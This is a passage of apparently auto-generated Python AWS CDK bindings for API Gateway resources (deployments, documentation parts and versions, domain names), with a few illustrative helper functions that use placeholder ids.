def stage_description(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.StageDescriptionProperty"]]]:
"""``AWS::ApiGateway::Deployment.StageDescription``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-stagedescription
"""
return self._values.get('stage_description')
@property
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-stagename
"""
return self._values.get('stage_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDeploymentProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
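# Illustrative sketch (not part of the generated bindings): CfnDeploymentProps
# mirrors the CfnDeployment constructor's keyword arguments; only rest_api_id
# is required. "abc123" and the other literals are hypothetical placeholders.
def _example_deployment_props() -> CfnDeploymentProps:
    return CfnDeploymentProps(
        rest_api_id="abc123",
        description="Example deployment",
        stage_name="prod",
    )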
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDeploymentV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDeploymentV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Deployment``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Deployment
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, description: typing.Optional[str]=None, stage_name: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Deployment``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param api_id: ``AWS::ApiGatewayV2::Deployment.ApiId``.
:param description: ``AWS::ApiGatewayV2::Deployment.Description``.
:param stage_name: ``AWS::ApiGatewayV2::Deployment.StageName``.
"""
props = CfnDeploymentV2Props(api_id=api_id, description=description, stage_name=stage_name)
jsii.create(CfnDeploymentV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Deployment.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Deployment.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-stagename
"""
return jsii.get(self, "stageName")
@stage_name.setter
def stage_name(self, value: typing.Optional[str]):
return jsii.set(self, "stageName", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeploymentV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'description': 'description', 'stage_name': 'stageName'})
class CfnDeploymentV2Props():
def __init__(self, *, api_id: str, description: typing.Optional[str]=None, stage_name: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Deployment``.
:param api_id: ``AWS::ApiGatewayV2::Deployment.ApiId``.
:param description: ``AWS::ApiGatewayV2::Deployment.Description``.
:param stage_name: ``AWS::ApiGatewayV2::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html
"""
self._values = {
'api_id': api_id,
}
if description is not None: self._values["description"] = description
if stage_name is not None: self._values["stage_name"] = stage_name
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Deployment.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-apiid
"""
return self._values.get('api_id')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Deployment.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-description
"""
return self._values.get('description')
@property
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-stagename
"""
return self._values.get('stage_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDeploymentV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
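# Illustrative sketch (not part of the generated bindings): creating an
# AWS::ApiGatewayV2::Deployment. The caller supplies the scope (typically a
# Stack); the construct id and api_id value are hypothetical.
def _example_deployment_v2(scope: aws_cdk.core.Construct) -> CfnDeploymentV2:
    return CfnDeploymentV2(
        scope, "ExampleDeploymentV2",
        api_id="a1b2c3",    # id of an existing HTTP or WebSocket API
        stage_name="prod",  # optional: stage this deployment should serve
    )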
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDocumentationPart(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationPart"):
"""A CloudFormation ``AWS::ApiGateway::DocumentationPart``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::DocumentationPart
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, location: typing.Union["LocationProperty", aws_cdk.core.IResolvable], properties: str, rest_api_id: str) -> None:
"""Create a new ``AWS::ApiGateway::DocumentationPart``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param location: ``AWS::ApiGateway::DocumentationPart.Location``.
:param properties: ``AWS::ApiGateway::DocumentationPart.Properties``.
:param rest_api_id: ``AWS::ApiGateway::DocumentationPart.RestApiId``.
"""
props = CfnDocumentationPartProps(location=location, properties=properties, rest_api_id=rest_api_id)
jsii.create(CfnDocumentationPart, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="location")
def location(self) -> typing.Union["LocationProperty", aws_cdk.core.IResolvable]:
"""``AWS::ApiGateway::DocumentationPart.Location``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-location
"""
return jsii.get(self, "location")
@location.setter
def location(self, value: typing.Union["LocationProperty", aws_cdk.core.IResolvable]):
return jsii.set(self, "location", value)
@property
@jsii.member(jsii_name="properties")
def properties(self) -> str:
"""``AWS::ApiGateway::DocumentationPart.Properties``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-properties
"""
return jsii.get(self, "properties")
@properties.setter
def properties(self, value: str):
return jsii.set(self, "properties", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::DocumentationPart.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationPart.LocationProperty", jsii_struct_bases=[], name_mapping={'method': 'method', 'name': 'name', 'path': 'path', 'status_code': 'statusCode', 'type': 'type'})
class LocationProperty():
def __init__(self, *, method: typing.Optional[str]=None, name: typing.Optional[str]=None, path: typing.Optional[str]=None, status_code: typing.Optional[str]=None, type: typing.Optional[str]=None):
"""
:param method: ``CfnDocumentationPart.LocationProperty.Method``.
:param name: ``CfnDocumentationPart.LocationProperty.Name``.
:param path: ``CfnDocumentationPart.LocationProperty.Path``.
:param status_code: ``CfnDocumentationPart.LocationProperty.StatusCode``.
:param type: ``CfnDocumentationPart.LocationProperty.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html
"""
self._values = {
}
if method is not None: self._values["method"] = method
if name is not None: self._values["name"] = name
if path is not None: self._values["path"] = path
if status_code is not None: self._values["status_code"] = status_code
if type is not None: self._values["type"] = type
@property
def method(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.Method``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-method
"""
return self._values.get('method')
@property
def name(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-name
"""
return self._values.get('name')
@property
def path(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.Path``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-path
"""
return self._values.get('path')
@property
def status_code(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-statuscode
"""
return self._values.get('status_code')
@property
def type(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-type
"""
return self._values.get('type')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'LocationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationPartProps", jsii_struct_bases=[], name_mapping={'location': 'location', 'properties': 'properties', 'rest_api_id': 'restApiId'})
class CfnDocumentationPartProps():
def __init__(self, *, location: typing.Union["CfnDocumentationPart.LocationProperty", aws_cdk.core.IResolvable], properties: str, rest_api_id: str):
"""Properties for defining a ``AWS::ApiGateway::DocumentationPart``.
:param location: ``AWS::ApiGateway::DocumentationPart.Location``.
:param properties: ``AWS::ApiGateway::DocumentationPart.Properties``.
:param rest_api_id: ``AWS::ApiGateway::DocumentationPart.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html
"""
self._values = {
'location': location,
'properties': properties,
'rest_api_id': rest_api_id,
}
@property
def location(self) -> typing.Union["CfnDocumentationPart.LocationProperty", aws_cdk.core.IResolvable]:
"""``AWS::ApiGateway::DocumentationPart.Location``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-location
"""
return self._values.get('location')
@property
def properties(self) -> str:
"""``AWS::ApiGateway::DocumentationPart.Properties``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-properties
"""
return self._values.get('properties')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::DocumentationPart.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-restapiid
"""
return self._values.get('rest_api_id')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDocumentationPartProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
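# Illustrative sketch (not part of the generated bindings): documenting a
# single GET method. LocationProperty pinpoints where the documentation
# applies, and ``properties`` carries the documentation content as a JSON
# string. The path, ids and description are hypothetical placeholders.
def _example_documentation_part(scope: aws_cdk.core.Construct) -> CfnDocumentationPart:
    location = CfnDocumentationPart.LocationProperty(
        type="METHOD",
        path="/pets",
        method="GET",
    )
    return CfnDocumentationPart(
        scope, "ExampleDocPart",
        location=location,
        properties='{"description": "List all pets"}',
        rest_api_id="abc123",
    )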
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDocumentationVersion(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationVersion"):
"""A CloudFormation ``AWS::ApiGateway::DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::DocumentationVersion
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, documentation_version: str, rest_api_id: str, description: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::DocumentationVersion``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param documentation_version: ``AWS::ApiGateway::DocumentationVersion.DocumentationVersion``.
:param rest_api_id: ``AWS::ApiGateway::DocumentationVersion.RestApiId``.
:param description: ``AWS::ApiGateway::DocumentationVersion.Description``.
"""
props = CfnDocumentationVersionProps(documentation_version=documentation_version, rest_api_id=rest_api_id, description=description)
jsii.create(CfnDocumentationVersion, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="documentationVersion")
def documentation_version(self) -> str:
"""``AWS::ApiGateway::DocumentationVersion.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-documentationversion
"""
return jsii.get(self, "documentationVersion")
@documentation_version.setter
def documentation_version(self, value: str):
return jsii.set(self, "documentationVersion", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::DocumentationVersion.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DocumentationVersion.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationVersionProps", jsii_struct_bases=[], name_mapping={'documentation_version': 'documentationVersion', 'rest_api_id': 'restApiId', 'description': 'description'})
class CfnDocumentationVersionProps():
def __init__(self, *, documentation_version: str, rest_api_id: str, description: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::DocumentationVersion``.
:param documentation_version: ``AWS::ApiGateway::DocumentationVersion.DocumentationVersion``.
:param rest_api_id: ``AWS::ApiGateway::DocumentationVersion.RestApiId``.
:param description: ``AWS::ApiGateway::DocumentationVersion.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html
"""
self._values = {
'documentation_version': documentation_version,
'rest_api_id': rest_api_id,
}
if description is not None: self._values["description"] = description
@property
def documentation_version(self) -> str:
"""``AWS::ApiGateway::DocumentationVersion.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-documentationversion
"""
return self._values.get('documentation_version')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::DocumentationVersion.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-restapiid
"""
return self._values.get('rest_api_id')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DocumentationVersion.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-description
"""
return self._values.get('description')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDocumentationVersionProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
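# Illustrative sketch (not part of the generated bindings): publishing the
# current documentation parts of an API under a version label. The version
# string and rest_api_id are hypothetical placeholders.
def _example_documentation_version(scope: aws_cdk.core.Construct) -> CfnDocumentationVersion:
    return CfnDocumentationVersion(
        scope, "ExampleDocVersion",
        documentation_version="v1",
        rest_api_id="abc123",
        description="First published snapshot",
    )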
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDomainName(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDomainName"):
"""A CloudFormation ``AWS::ApiGateway::DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::DomainName
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, domain_name: str, certificate_arn: typing.Optional[str]=None, endpoint_configuration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]=None, regional_certificate_arn: typing.Optional[str]=None, security_policy: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None) -> None:
"""Create a new ``AWS::ApiGateway::DomainName``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param domain_name: ``AWS::ApiGateway::DomainName.DomainName``.
:param certificate_arn: ``AWS::ApiGateway::DomainName.CertificateArn``.
:param endpoint_configuration: ``AWS::ApiGateway::DomainName.EndpointConfiguration``.
:param regional_certificate_arn: ``AWS::ApiGateway::DomainName.RegionalCertificateArn``.
:param security_policy: ``AWS::ApiGateway::DomainName.SecurityPolicy``.
:param tags: ``AWS::ApiGateway::DomainName.Tags``.
"""
props = CfnDomainNameProps(domain_name=domain_name, certificate_arn=certificate_arn, endpoint_configuration=endpoint_configuration, regional_certificate_arn=regional_certificate_arn, security_policy=security_policy, tags=tags)
jsii.create(CfnDomainName, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="attrDistributionDomainName")
def attr_distribution_domain_name(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: DistributionDomainName
"""
return jsii.get(self, "attrDistributionDomainName")
@property
@jsii.member(jsii_name="attrDistributionHostedZoneId")
def attr_distribution_hosted_zone_id(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: DistributionHostedZoneId
"""
return jsii.get(self, "attrDistributionHostedZoneId")
@property
@jsii.member(jsii_name="attrRegionalDomainName")
def attr_regional_domain_name(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RegionalDomainName
"""
return jsii.get(self, "attrRegionalDomainName")
@property
@jsii.member(jsii_name="attrRegionalHostedZoneId")
def attr_regional_hosted_zone_id(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RegionalHostedZoneId
"""
return jsii.get(self, "attrRegionalHostedZoneId")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""``AWS::ApiGateway::DomainName.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-domainname
"""
return jsii.get(self, "domainName")
@domain_name.setter
def domain_name(self, value: str):
return jsii.set(self, "domainName", value)
@property
@jsii.member(jsii_name="certificateArn")
def certificate_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.CertificateArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-certificatearn
"""
return jsii.get(self, "certificateArn")
@certificate_arn.setter
def certificate_arn(self, value: typing.Optional[str]):
return jsii.set(self, "certificateArn", value)
@property
@jsii.member(jsii_name="endpointConfiguration")
def endpoint_configuration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]:
"""``AWS::ApiGateway::DomainName.EndpointConfiguration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-endpointconfiguration
"""
return jsii.get(self, "endpointConfiguration")
@endpoint_configuration.setter
def endpoint_configuration(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]):
return jsii.set(self, "endpointConfiguration", value)
@property
@jsii.member(jsii_name="regionalCertificateArn")
def regional_certificate_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.RegionalCertificateArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-regionalcertificatearn
"""
return jsii.get(self, "regionalCertificateArn")
@regional_certificate_arn.setter
def regional_certificate_arn(self, value: typing.Optional[str]):
return jsii.set(self, "regionalCertificateArn", value)
@property
@jsii.member(jsii_name="securityPolicy")
def security_policy(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.SecurityPolicy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-securitypolicy
"""
return jsii.get(self, "securityPolicy")
@security_policy.setter
def security_policy(self, value: typing.Optional[str]):
return jsii.set(self, "securityPolicy", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDomainName.EndpointConfigurationProperty", jsii_struct_bases=[], name_mapping={'types': 'types'})
class EndpointConfigurationProperty():
def __init__(self, *, types: typing.Optional[typing.List[str]]=None):
"""
:param types: ``CfnDomainName.EndpointConfigurationProperty.Types``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-domainname-endpointconfiguration.html
"""
self._values = {
}
if types is not None: self._values["types"] = types
@property
def types(self) -> typing.Optional[typing.List[str]]:
"""``CfnDomainName.EndpointConfigurationProperty.Types``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-domainname-endpointconfiguration.html#cfn-apigateway-domainname-endpointconfiguration-types
"""
return self._values.get('types')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'EndpointConfigurationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDomainNameProps", jsii_struct_bases=[], name_mapping={'domain_name': 'domainName', 'certificate_arn': 'certificateArn', 'endpoint_configuration': 'endpointConfiguration', 'regional_certificate_arn': 'regionalCertificateArn', 'security_policy': 'securityPolicy', 'tags': 'tags'})
class CfnDomainNameProps():
def __init__(self, *, domain_name: str, certificate_arn: typing.Optional[str]=None, endpoint_configuration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDomainName.EndpointConfigurationProperty"]]]=None, regional_certificate_arn: typing.Optional[str]=None, security_policy: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None):
"""Properties for defining a ``AWS::ApiGateway::DomainName``.
:param domain_name: ``AWS::ApiGateway::DomainName.DomainName``.
:param certificate_arn: ``AWS::ApiGateway::DomainName.CertificateArn``.
:param endpoint_configuration: ``AWS::ApiGateway::DomainName.EndpointConfiguration``.
:param regional_certificate_arn: ``AWS::ApiGateway::DomainName.RegionalCertificateArn``.
:param security_policy: ``AWS::ApiGateway::DomainName.SecurityPolicy``.
:param tags: ``AWS::ApiGateway::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html
"""
self._values = {
'domain_name': domain_name,
}
if certificate_arn is not None: self._values["certificate_arn"] = certificate_arn
if endpoint_configuration is not None: self._values["endpoint_configuration"] = endpoint_configuration
if regional_certificate_arn is not None: self._values["regional_certificate_arn"] = regional_certificate_arn
if security_policy is not None: self._values["security_policy"] = security_policy
if tags is not None: self._values["tags"] = tags
@property
def domain_name(self) -> str:
"""``AWS::ApiGateway::DomainName.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-domainname
"""
return self._values.get('domain_name')
@property
def certificate_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.CertificateArn``.
see
